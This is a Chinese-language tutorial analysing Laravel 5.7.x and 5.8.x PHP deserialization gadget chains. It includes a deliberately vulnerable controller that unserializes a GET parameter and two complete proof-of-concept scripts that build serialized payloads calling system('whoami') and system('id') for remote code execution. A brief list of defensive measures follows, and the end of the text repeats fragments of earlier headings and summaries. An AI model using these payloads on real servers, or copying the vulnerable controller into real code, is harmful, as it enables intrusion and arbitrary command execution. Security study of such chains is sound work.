Laravel反序列化漏洞分析与利用链教学文档<\/h1>

一、漏洞概述<\/h2>
Laravel框架中存在反序列化漏洞，攻击者可以通过精心构造的序列化数据在目标系统上执行任意代码。本文详细分析Laravel 5.8.x和5.7.x版本中的反序列化利用链。<\/p>

二、Laravel 5.8.x 反序列化利用链分析<\/h2>

1. 环境配置<\/h3>

首先创建一个简单的DemoController控制器：<\/p>

\/\/ DemoController.php
<\/span><\/span><\/span><\/span><?<\/span>php<\/span>
<\/span><\/span>namespace<\/span> App\Http\Controllers<\/span>;
<\/span><\/span>
<\/span><\/span>class<\/span> DemoController<\/span> extends<\/span> Controller<\/span> {
<\/span><\/span>    public<\/span> function<\/span> demo<\/span>() {
<\/span><\/span>        if<\/span> (isset<\/span>($_GET['c'<\/span>])) {
<\/span><\/span>            $code =<\/span> $_GET['c'<\/span>];
<\/span><\/span>            unserialize<\/span>($code);
<\/span><\/span>        } else<\/span> {
<\/span><\/span>            highlight_file<\/span>(__FILE__<\/span>);
<\/span><\/span>        }
<\/span><\/span>        return<\/span> "Welcome to laravel5.8"<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>在routes\/web.php<\/code>中添加路由：<\/p>
Route<\/span>::<\/span>get<\/span>("\/demo"<\/span>,"\App\Http\Controllers\DemoController@demo"<\/span>);
<\/span><\/span><\/code><\/pre>2. 利用链分析<\/h3>
2.1 起点：PendingBroadcast::__destruct()<\/h4>
全局搜索__destruct()<\/code>方法，找到Illuminate\Broadcasting\PendingBroadcast::__destruct()<\/code>：<\/p>
public<\/span> function<\/span> __destruct() {
<\/span><\/span>    $this-><\/span>events<\/span>-><\/span>dispatch<\/span>($this-><\/span>event<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>events<\/code>和event<\/code>参数可控，通过控制events<\/code>参数可以调用任意类的dispatch()<\/code>方法。<\/p>
2.2 中间跳板：Dispatcher::dispatch()<\/h4>
寻找可利用的dispatch()<\/code>方法，发现Illuminate\Bus\Dispatcher::dispatch()<\/code>：<\/p>
public<\/span> function<\/span> dispatch<\/span>($command) {
<\/span><\/span>    if<\/span> ($this-><\/span>queueResolver<\/span> &&<\/span> $this-><\/span>commandShouldBeQueued<\/span>($command)) {
<\/span><\/span>        return<\/span> $this-><\/span>dispatchToQueue<\/span>($command);
<\/span><\/span>    }
<\/span><\/span>    return<\/span> $this-><\/span>dispatchNow<\/span>($command);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.3 关键调用：dispatchToQueue()<\/h4>
dispatchToQueue()<\/code>方法中包含call_user_func()<\/code>：<\/p>
public<\/span> function<\/span> dispatchToQueue<\/span>($command) {
<\/span><\/span>    $connection =<\/span> $command-><\/span>connection<\/span> ??<\/span> null<\/span>;
<\/span><\/span>    $queue =<\/span> call_user_func<\/span>($this-><\/span>queueResolver<\/span>, $connection);
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.4 条件绕过<\/h4>
要执行到dispatchToQueue()<\/code>方法需要满足：<\/p>

$this->queueResolver<\/code>有值（可控）<\/li>
$this->commandShouldBeQueued($command)<\/code>返回true<\/li>
<\/ol>
commandShouldBeQueued()<\/code>方法：<\/p>
protected<\/span> function<\/span> commandShouldBeQueued<\/span>($command) {
<\/span><\/span>    return<\/span> $command instanceof<\/span> ShouldQueue<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>需要$command<\/code>（即PendingBroadcast<\/code>类中的$this->event<\/code>）是一个继承ShouldQueue<\/code>接口的类，如BroadcastEvent<\/code>类。<\/p>
3. 完整利用链<\/h3>

Illuminate\Broadcasting\PendingBroadcast<\/code>的__destruct()<\/code><\/li>
Illuminate\Bus\Dispatcher<\/code>的dispatch()<\/code><\/li>
Illuminate\Broadcasting\BroadcastEvent<\/code>用于继承ShouldQueue<\/code>接口<\/li>
<\/ol>
4. POC代码<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>namespace<\/span> Illuminate\Broadcasting<\/span> {
<\/span><\/span>    class<\/span> PendingBroadcast<\/span> {
<\/span><\/span>        protected<\/span> $events;
<\/span><\/span>        protected<\/span> $event;
<\/span><\/span>        public<\/span> function<\/span> __construct($events=<\/span>""<\/span>, $event=<\/span>""<\/span>) {
<\/span><\/span>            $this-><\/span>events<\/span> =<\/span> $events;
<\/span><\/span>            $this-><\/span>event<\/span> =<\/span> $event;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> Illuminate\Bus<\/span> {
<\/span><\/span>    class<\/span> Dispatcher<\/span> {
<\/span><\/span>        protected<\/span> $queueResolver =<\/span> "system"<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> Illuminate\Broadcasting<\/span> {
<\/span><\/span>    class<\/span> BroadcastEvent<\/span> {
<\/span><\/span>        public<\/span> $connection =<\/span> "whoami"<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> {
<\/span><\/span>    $d =<\/span> new<\/span> Illuminate\Bus\Dispatcher<\/span>();
<\/span><\/span>    $b =<\/span> new<\/span> Illuminate\Broadcasting\BroadcastEvent<\/span>();
<\/span><\/span>    $p =<\/span> new<\/span> Illuminate\Broadcasting\PendingBroadcast<\/span>($d, $b);
<\/span><\/span>    echo<\/span> urlencode<\/span>(serialize<\/span>($p));
<\/span><\/span>}
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>三、Laravel 5.7.x 反序列化利用链分析<\/h2>
1. 关键类与属性<\/h3>

$test<\/code>: 实例化的Illuminate\Auth\GenericUser<\/code><\/li>
$app<\/code>: 实例化的Illuminate\Foundation\Application<\/code><\/li>
$command<\/code>: 要执行的PHP函数（如system<\/code>）<\/li>
$parameters<\/code>: 函数参数（如array('id')<\/code>）<\/li>
<\/ul>
2. 利用链分析<\/h3>
2.1 起点：PendingCommand::__destruct()<\/h4>
public<\/span> function<\/span> __destruct() {
<\/span><\/span>    if<\/span> ($this-><\/span>hasExecuted<\/span>) {
<\/span><\/span>        return<\/span>;
<\/span><\/span>    }
<\/span><\/span>    $this-><\/span>run<\/span>();
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.2 关键调用：run()<\/h4>
public<\/span> function<\/span> run<\/span>() {
<\/span><\/span>    $this-><\/span>hasExecuted<\/span> =<\/span> true<\/span>;
<\/span><\/span>    $this-><\/span>mockConsoleOutput<\/span>();
<\/span><\/span>    try<\/span> {
<\/span><\/span>        $exitCode =<\/span> $this-><\/span>app<\/span>[Kernel<\/span>::<\/span>class<\/span>]-><\/span>call<\/span>($this-><\/span>command<\/span>, $this-><\/span>parameters<\/span>);
<\/span><\/span>    }
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.3 mockConsoleOutput()绕过<\/h4>
mockConsoleOutput()<\/code>方法中需要$this->test->expectedQuestions<\/code>为数组：<\/p>
foreach<\/span> ($this-><\/span>test<\/span>-><\/span>expectedQuestions<\/span> as<\/span> $i =><\/span> $question) {
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>使用DefaultGenerator<\/code>类的__get()<\/code>方法返回数组：<\/p>
class<\/span> DefaultGenerator<\/span> {
<\/span><\/span>    protected<\/span> $default;
<\/span><\/span>    public<\/span> function<\/span> __construct($default =<\/span> null<\/span>) {
<\/span><\/span>        $this-><\/span>default<\/span> =<\/span> $default;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    public<\/span> function<\/span> __get($attribute) {
<\/span><\/span>        return<\/span> $this-><\/span>default<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.4 最终调用<\/h4>
通过Application<\/code>类的call()<\/code>方法最终调用call_user_func_array()<\/code>执行命令。<\/p>
3. 完整POC<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>namespace<\/span> Illuminate\Foundation\Testing<\/span> {
<\/span><\/span>    class<\/span> PendingCommand<\/span> {
<\/span><\/span>        protected<\/span> $command;
<\/span><\/span>        protected<\/span> $parameters;
<\/span><\/span>        public<\/span> $test;
<\/span><\/span>        protected<\/span> $app;
<\/span><\/span>        public<\/span> function<\/span> __construct($test, $app, $command, $parameters) {
<\/span><\/span>            $this-><\/span>app<\/span> =<\/span> $app;
<\/span><\/span>            $this-><\/span>test<\/span> =<\/span> $test;
<\/span><\/span>            $this-><\/span>command<\/span> =<\/span> $command;
<\/span><\/span>            $this-><\/span>parameters<\/span> =<\/span> $parameters;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> Faker<\/span> {
<\/span><\/span>    class<\/span> DefaultGenerator<\/span> {
<\/span><\/span>        protected<\/span> $default;
<\/span><\/span>        public<\/span> function<\/span> __construct($default =<\/span> null<\/span>) {
<\/span><\/span>            $this-><\/span>default<\/span> =<\/span> $default;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> Illuminate\Foundation<\/span> {
<\/span><\/span>    class<\/span> Application<\/span> {
<\/span><\/span>        protected<\/span> $instances =<\/span> [];
<\/span><\/span>        public<\/span> function<\/span> __construct($instances =<\/span> []){
<\/span><\/span>            $this-><\/span>instances<\/span>['Illuminate\Contracts\Console\Kernel'<\/span>] =<\/span> $instances;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> {
<\/span><\/span>    $defaultgenerator =<\/span> new<\/span> Faker\DefaultGenerator<\/span>(array<\/span>("hello"<\/span> =><\/span> "ghtwf01"<\/span>));
<\/span><\/span>    $app =<\/span> new<\/span> Illuminate\Foundation\Application<\/span>();
<\/span><\/span>    $application =<\/span> new<\/span> Illuminate\Foundation\Application<\/span>($app);
<\/span><\/span>    $pendingcommand =<\/span> new<\/span> Illuminate\Foundation\Testing\PendingCommand<\/span>($defaultgenerator, $application, "system"<\/span>, array<\/span>("id"<\/span>));
<\/span><\/span>    echo<\/span> urlencode<\/span>(serialize<\/span>($pendingcommand));
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>四、防御措施<\/h2>

避免反序列化用户可控的输入<\/li>
及时升级Laravel框架到最新版本<\/li>
使用__wakeup()<\/code>或__destruct()<\/code>方法时进行安全检查<\/li>
实现对象序列化白名单机制<\/li>
<\/ol>
五、总结<\/h2>
本文详细分析了Laravel 5.8.x和5.7.x版本中的反序列化漏洞利用链，通过精心构造的序列化数据可以实现任意代码执行。理解这些利用链有助于开发者更好地防御此类漏洞。<\/p>

Laravel反序列化漏洞分析与利用链教学文档<\/h1>

一、漏洞概述<\/h2> Laravel框架中存在反序列化漏洞，攻击者可以通过精心构造的序列化数据在目标系统上执行任意代码。本文详细分析Laravel 5.8.x和5.7.x版本中的反序列化利用链。<\/p>

二、Laravel 5.8.x 反序列化利用链分析<\/h2>

2. 利用链分析<\/h3>

三、Laravel 5.7.x 反序列化利用链分析<\/h2>

2. 利用链分析<\/h3>

2.4 最终调用<\/h4> 通过Application<\/code>类的call()<\/code>方法最终调用call_user_func_array()<\/code>执行命令。<\/p>

五、总结<\/h2> 本文详细分析了Laravel 5.8.x和5.7.x版本中的反序列化漏洞利用链，通过精心构造的序列化数据可以实现任意代码执行。理解这些利用链有助于开发者更好地防御此类漏洞。<\/p>

一、漏洞概述<\/h2>
Laravel框架中存在反序列化漏洞，攻击者可以通过精心构造的序列化数据在目标系统上执行任意代码。本文详细分析Laravel 5.8.x和5.7.x版本中的反序列化利用链。<\/p>

2.4 最终调用<\/h4>
通过`Application<\/code>类的call()<\/code>方法最终调用call_user_func_array()<\/code>执行命令。<\/p>`

五、总结<\/h2>
本文详细分析了Laravel 5.8.x和5.7.x版本中的反序列化漏洞利用链，通过精心构造的序列化数据可以实现任意代码执行。理解这些利用链有助于开发者更好地防御此类漏洞。<\/p>